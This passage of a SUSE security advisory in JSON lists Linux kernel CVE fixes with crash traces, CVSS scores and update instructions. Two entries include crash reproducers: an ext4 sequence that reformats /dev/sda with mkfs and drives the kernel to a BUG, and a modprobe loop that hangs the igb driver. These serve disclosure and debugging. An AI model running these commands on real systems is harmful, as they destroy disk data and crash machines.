"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: fix BUG in ext4_mb_new_inode_pa() due to overflow\n\nWhen we calculate the end position of ext4_free_extent, this position may\nbe exactly where ext4_lblk_t (i.e. uint) overflows. For example, if\nac_g_ex.fe_logical is 4294965248 and ac_orig_goal_len is 2048, then the\ncomputed end is 0x100000000, which is 0. If ac-\u003eac_o_ex.fe_logical is not\nthe first case of adjusting the best extent, that is, new_bex_end \u003e 0, the\nfollowing BUG_ON will be triggered:\n\n=========================================================\nkernel BUG at fs/ext4/mballoc.c:5116!\ninvalid opcode: 0000 [#1] PREEMPT SMP PTI\nCPU: 3 PID: 673 Comm: xfs_io Tainted: G E 6.5.0-rc1+ #279\nRIP: 0010:ext4_mb_new_inode_pa+0xc5/0x430\nCall Trace:\n \u003cTASK\u003e\n ext4_mb_use_best_found+0x203/0x2f0\n ext4_mb_try_best_found+0x163/0x240\n ext4_mb_regular_allocator+0x158/0x1550\n ext4_mb_new_blocks+0x86a/0xe10\n ext4_ext_map_blocks+0xb0c/0x13a0\n ext4_map_blocks+0x2cd/0x8f0\n ext4_iomap_begin+0x27b/0x400\n iomap_iter+0x222/0x3d0\n __iomap_dio_rw+0x243/0xcb0\n iomap_dio_rw+0x16/0x80\n=========================================================\n\nA simple reproducer demonstrating the problem:\n\n\tmkfs.ext4 -F /dev/sda -b 4096 100M\n\tmount /dev/sda /tmp/test\n\tfallocate -l1M /tmp/test/tmp\n\tfallocate -l10M /tmp/test/file\n\tfallocate -i -o 1M -l16777203M /tmp/test/file\n\tfsstress -d /tmp/test -l 0 -n 100000 -p 8 \u0026\n\tsleep 10 \u0026\u0026 killall -9 fsstress\n\trm -f /tmp/test/tmp\n\txfs_io -c \"open -ad /tmp/test/file\" -c \"pwrite -S 0xff 0 8192\"\n\nWe simply refactor the logic for adjusting the best extent by adding\na temporary ext4_free_extent ex and use extent_logical_end() to avoid\noverflow, which also simplifies the code.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54069",
"url": "https://www.suse.com/security/cve/CVE-2023-54069"
},
{
"category": "external",
"summary": "SUSE Bug 1256371 for CVE-2023-54069",
"url": "https://bugzilla.suse.com/1256371"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54069"
},
{
"cve": "CVE-2023-54070",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54070"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nigb: clean up in all error paths when enabling SR-IOV\n\nAfter commit 50f303496d92 (\"igb: Enable SR-IOV after reinit\"), removing\nthe igb module could hang or crash (depending on the machine) when the\nmodule has been loaded with the max_vfs parameter set to some value != 0.\n\nIn case of one test machine with a dual port 82580, this hang occurred:\n\n[ 232.480687] igb 0000:41:00.1: removed PHC on enp65s0f1\n[ 233.093257] igb 0000:41:00.1: IOV Disabled\n[ 233.329969] pcieport 0000:40:01.0: AER: Multiple Uncorrected (Non-Fatal) err0\n[ 233.340302] igb 0000:41:00.0: PCIe Bus Error: severity=Uncorrected (Non-Fata)\n[ 233.352248] igb 0000:41:00.0: device [8086:1516] error status/mask=00100000\n[ 233.361088] igb 0000:41:00.0: [20] UnsupReq (First)\n[ 233.368183] igb 0000:41:00.0: AER: TLP Header: 40000001 0000040f cdbfc00c c\n[ 233.376846] igb 0000:41:00.1: PCIe Bus Error: severity=Uncorrected (Non-Fata)\n[ 233.388779] igb 0000:41:00.1: device [8086:1516] error status/mask=00100000\n[ 233.397629] igb 0000:41:00.1: [20] UnsupReq (First)\n[ 233.404736] igb 0000:41:00.1: AER: TLP Header: 40000001 0000040f cdbfc00c c\n[ 233.538214] pci 0000:41:00.1: AER: can\u0027t recover (no error_detected callback)\n[ 233.538401] igb 0000:41:00.0: removed PHC on enp65s0f0\n[ 233.546197] pcieport 0000:40:01.0: AER: device recovery failed\n[ 234.157244] igb 0000:41:00.0: IOV Disabled\n[ 371.619705] INFO: task irq/35-aerdrv:257 blocked for more than 122 seconds.\n[ 371.627489] Not tainted 6.4.0-dirty #2\n[ 371.632257] \"echo 0 \u003e /proc/sys/kernel/hung_task_timeout_secs\" disables this.\n[ 371.641000] task:irq/35-aerdrv state:D stack:0 pid:257 ppid:2 f0\n[ 371.650330] Call Trace:\n[ 371.653061] \u003cTASK\u003e\n[ 371.655407] __schedule+0x20e/0x660\n[ 371.659313] schedule+0x5a/0xd0\n[ 371.662824] schedule_preempt_disabled+0x11/0x20\n[ 371.667983] __mutex_lock.constprop.0+0x372/0x6c0\n[ 371.673237] ? __pfx_aer_root_reset+0x10/0x10\n[ 371.678105] report_error_detected+0x25/0x1c0\n[ 371.682974] ? __pfx_report_normal_detected+0x10/0x10\n[ 371.688618] pci_walk_bus+0x72/0x90\n[ 371.692519] pcie_do_recovery+0xb2/0x330\n[ 371.696899] aer_process_err_devices+0x117/0x170\n[ 371.702055] aer_isr+0x1c0/0x1e0\n[ 371.705661] ? __set_cpus_allowed_ptr+0x54/0xa0\n[ 371.710723] ? __pfx_irq_thread_fn+0x10/0x10\n[ 371.715496] irq_thread_fn+0x20/0x60\n[ 371.719491] irq_thread+0xe6/0x1b0\n[ 371.723291] ? __pfx_irq_thread_dtor+0x10/0x10\n[ 371.728255] ? __pfx_irq_thread+0x10/0x10\n[ 371.732731] kthread+0xe2/0x110\n[ 371.736243] ? __pfx_kthread+0x10/0x10\n[ 371.740430] ret_from_fork+0x2c/0x50\n[ 371.744428] \u003c/TASK\u003e\n\nThe reproducer was a simple script:\n\n #!/bin/sh\n for i in `seq 1 5`; do\n modprobe -rv igb\n modprobe -v igb max_vfs=1\n sleep 1\n modprobe -rv igb\n done\n\nIt turned out that this could only be reproduce on 82580 (quad and\ndual-port), but not on 82576, i350 and i210. Further debugging showed\nthat igb_enable_sriov()\u0027s call to pci_enable_sriov() is failing, because\ndev-\u003eis_physfn is 0 on 82580.\n\nPrior to commit 50f303496d92 (\"igb: Enable SR-IOV after reinit\"),\nigb_enable_sriov() jumped into the \"err_out\" cleanup branch. After this\ncommit it only returned the error code.\n\nSo the cleanup didn\u0027t take place, and the incorrect VF setup in the\nigb_adapter structure fooled the igb driver into assuming that VFs have\nbeen set up where no VF actually existed.\n\nFix this problem by cleaning up again if pci_enable_sriov() fails.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54070",
"url": "https://www.suse.com/security/cve/CVE-2023-54070"
},
{
"category": "external",
"summary": "SUSE Bug 1256364 for CVE-2023-54070",
"url": "https://bugzilla.suse.com/1256364"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54070"
},
{
"cve": "CVE-2023-54072",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54072"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: pcm: Fix potential data race at PCM memory allocation helpers\n\nThe PCM memory allocation helpers have a sanity check against too many\nbuffer allocations. However, the check is performed without a proper\nlock and the allocation isn\u0027t serialized; this allows user to allocate\nmore memories than predefined max size.\n\nPractically seen, this isn\u0027t really a big problem, as it\u0027s more or\nless some \"soft limit\" as a sanity check, and it\u0027s not possible to\nallocate unlimitedly. But it\u0027s still better to address this for more\nconsistent behavior.\n\nThe patch covers the size check in do_alloc_pages() with the\ncard-\u003ememory_mutex, and increases the allocated size there for\npreventing the further overflow. When the actual allocation fails,\nthe size is decreased accordingly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54072",
"url": "https://www.suse.com/security/cve/CVE-2023-54072"
},
{
"category": "external",
"summary": "SUSE Bug 1256291 for CVE-2023-54072",
"url": "https://bugzilla.suse.com/1256291"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54072"
},
{
"cve": "CVE-2023-54076",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54076"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix missed ses refcounting\n\nUse new cifs_smb_ses_inc_refcount() helper to get an active reference\nof @ses and @ses-\u003edfs_root_ses (if set). This will prevent\n@ses-\u003edfs_root_ses of being put in the next call to cifs_put_smb_ses()\nand thus potentially causing an use-after-free bug.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54076",
"url": "https://www.suse.com/security/cve/CVE-2023-54076"
},
{
"category": "external",
"summary": "SUSE Bug 1256335 for CVE-2023-54076",
"url": "https://bugzilla.suse.com/1256335"
},
{
"category": "external",
"summary": "SUSE Bug 1256450 for CVE-2023-54076",
"url": "https://bugzilla.suse.com/1256450"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2023-54076"
},
{
"cve": "CVE-2023-54080",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54080"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: zoned: skip splitting and logical rewriting on pre-alloc write\n\nWhen doing a relocation, there is a chance that at the time of\nbtrfs_reloc_clone_csums(), there is no checksum for the corresponding\nregion.\n\nIn this case, btrfs_finish_ordered_zoned()\u0027s sum points to an invalid item\nand so ordered_extent\u0027s logical is set to some invalid value. Then,\nbtrfs_lookup_block_group() in btrfs_zone_finish_endio() failed to find a\nblock group and will hit an assert or a null pointer dereference as\nfollowing.\n\nThis can be reprodcued by running btrfs/028 several times (e.g, 4 to 16\ntimes) with a null_blk setup. The device\u0027s zone size and capacity is set to\n32 MB and the storage size is set to 5 GB on my setup.\n\n KASAN: null-ptr-deref in range [0x0000000000000088-0x000000000000008f]\n CPU: 6 PID: 3105720 Comm: kworker/u16:13 Tainted: G W 6.5.0-rc6-kts+ #1\n Hardware name: Supermicro Super Server/X10SRL-F, BIOS 2.0 12/17/2015\n Workqueue: btrfs-endio-write btrfs_work_helper [btrfs]\n RIP: 0010:btrfs_zone_finish_endio.part.0+0x34/0x160 [btrfs]\n Code: 41 54 49 89 fc 55 48 89 f5 53 e8 57 7d fc ff 48 8d b8 88 00 00 00 48 89 c3 48 b8 00 00 00 00 00\n \u003e 3c 02 00 0f 85 02 01 00 00 f6 83 88 00 00 00 01 0f 84 a8 00 00\n RSP: 0018:ffff88833cf87b08 EFLAGS: 00010206\n RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000\n RDX: 0000000000000011 RSI: 0000000000000004 RDI: 0000000000000088\n RBP: 0000000000000002 R08: 0000000000000001 R09: ffffed102877b827\n R10: ffff888143bdc13b R11: ffff888125b1cbc0 R12: ffff888143bdc000\n R13: 0000000000007000 R14: ffff888125b1cba8 R15: 0000000000000000\n FS: 0000000000000000(0000) GS:ffff88881e500000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 00007f3ed85223d5 CR3: 00000001519b4005 CR4: 00000000001706e0\n Call Trace:\n \u003cTASK\u003e\n ? die_addr+0x3c/0xa0\n ? exc_general_protection+0x148/0x220\n ? asm_exc_general_protection+0x22/0x30\n ? btrfs_zone_finish_endio.part.0+0x34/0x160 [btrfs]\n ? btrfs_zone_finish_endio.part.0+0x19/0x160 [btrfs]\n btrfs_finish_one_ordered+0x7b8/0x1de0 [btrfs]\n ? rcu_is_watching+0x11/0xb0\n ? lock_release+0x47a/0x620\n ? btrfs_finish_ordered_zoned+0x59b/0x800 [btrfs]\n ? __pfx_btrfs_finish_one_ordered+0x10/0x10 [btrfs]\n ? btrfs_finish_ordered_zoned+0x358/0x800 [btrfs]\n ? __smp_call_single_queue+0x124/0x350\n ? rcu_is_watching+0x11/0xb0\n btrfs_work_helper+0x19f/0xc60 [btrfs]\n ? __pfx_try_to_wake_up+0x10/0x10\n ? _raw_spin_unlock_irq+0x24/0x50\n ? rcu_is_watching+0x11/0xb0\n process_one_work+0x8c1/0x1430\n ? __pfx_lock_acquire+0x10/0x10\n ? __pfx_process_one_work+0x10/0x10\n ? __pfx_do_raw_spin_lock+0x10/0x10\n ? _raw_spin_lock_irq+0x52/0x60\n worker_thread+0x100/0x12c0\n ? __kthread_parkme+0xc1/0x1f0\n ? __pfx_worker_thread+0x10/0x10\n kthread+0x2ea/0x3c0\n ? __pfx_kthread+0x10/0x10\n ret_from_fork+0x30/0x70\n ? __pfx_kthread+0x10/0x10\n ret_from_fork_asm+0x1b/0x30\n \u003c/TASK\u003e\n\nOn the zoned mode, writing to pre-allocated region means data relocation\nwrite. Such write always uses WRITE command so there is no need of splitting\nand rewriting logical address. Thus, we can just skip the function for the\ncase.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54080",
"url": "https://www.suse.com/security/cve/CVE-2023-54080"
},
{
"category": "external",
"summary": "SUSE Bug 1256367 for CVE-2023-54080",
"url": "https://bugzilla.suse.com/1256367"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54080"
},
{
"cve": "CVE-2023-54081",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54081"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nxen: speed up grant-table reclaim\n\nWhen a grant entry is still in use by the remote domain, Linux must put\nit on a deferred list. Normally, this list is very short, because\nthe PV network and block protocols expect the backend to unmap the grant\nfirst. However, Qubes OS\u0027s GUI protocol is subject to the constraints\nof the X Window System, and as such winds up with the frontend unmapping\nthe window first. As a result, the list can grow very large, resulting\nin a massive memory leak and eventual VM freeze.\n\nTo partially solve this problem, make the number of entries that the VM\nwill attempt to free at each iteration tunable. The default is still\n10, but it can be overridden via a module parameter.\n\nThis is Cc: stable because (when combined with appropriate userspace\nchanges) it fixes a severe performance and stability problem for Qubes\nOS users.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54081",
"url": "https://www.suse.com/security/cve/CVE-2023-54081"
},
{
"category": "external",
"summary": "SUSE Bug 1256361 for CVE-2023-54081",
"url": "https://bugzilla.suse.com/1256361"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54081"
},
{
"cve": "CVE-2023-54083",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54083"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nphy: tegra: xusb: Clear the driver reference in usb-phy dev\n\nFor the dual-role port, it will assign the phy dev to usb-phy dev and\nuse the port dev driver as the dev driver of usb-phy.\n\nWhen we try to destroy the port dev, it will destroy its dev driver\nas well. But we did not remove the reference from usb-phy dev. This\nmight cause the use-after-free issue in KASAN.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54083",
"url": "https://www.suse.com/security/cve/CVE-2023-54083"
},
{
"category": "external",
"summary": "SUSE Bug 1256368 for CVE-2023-54083",
"url": "https://bugzilla.suse.com/1256368"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54083"
},
{
"cve": "CVE-2023-54088",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54088"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-cgroup: hold queue_lock when removing blkg-\u003eq_node\n\nWhen blkg is removed from q-\u003eblkg_list from blkg_free_workfn(), queue_lock\nhas to be held, otherwise, all kinds of bugs(list corruption, hard lockup,\n..) can be triggered from blkg_destroy_all().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54088",
"url": "https://www.suse.com/security/cve/CVE-2023-54088"
},
{
"category": "external",
"summary": "SUSE Bug 1256263 for CVE-2023-54088",
"url": "https://bugzilla.suse.com/1256263"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54088"
},
{
"cve": "CVE-2023-54089",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54089"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvirtio_pmem: add the missing REQ_OP_WRITE for flush bio\n\nWhen doing mkfs.xfs on a pmem device, the following warning was\n\n ------------[ cut here ]------------\n WARNING: CPU: 2 PID: 384 at block/blk-core.c:751 submit_bio_noacct\n Modules linked in:\n CPU: 2 PID: 384 Comm: mkfs.xfs Not tainted 6.4.0-rc7+ #154\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996)\n RIP: 0010:submit_bio_noacct+0x340/0x520\n ......\n Call Trace:\n \u003cTASK\u003e\n ? submit_bio_noacct+0xd5/0x520\n submit_bio+0x37/0x60\n async_pmem_flush+0x79/0xa0\n nvdimm_flush+0x17/0x40\n pmem_submit_bio+0x370/0x390\n __submit_bio+0xbc/0x190\n submit_bio_noacct_nocheck+0x14d/0x370\n submit_bio_noacct+0x1ef/0x520\n submit_bio+0x55/0x60\n submit_bio_wait+0x5a/0xc0\n blkdev_issue_flush+0x44/0x60\n\nThe root cause is that submit_bio_noacct() needs bio_op() is either\nWRITE or ZONE_APPEND for flush bio and async_pmem_flush() doesn\u0027t assign\nREQ_OP_WRITE when allocating flush bio, so submit_bio_noacct just fail\nthe flush bio.\n\nSimply fix it by adding the missing REQ_OP_WRITE for flush bio. And we\ncould fix the flush order issue and do flush optimization later.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
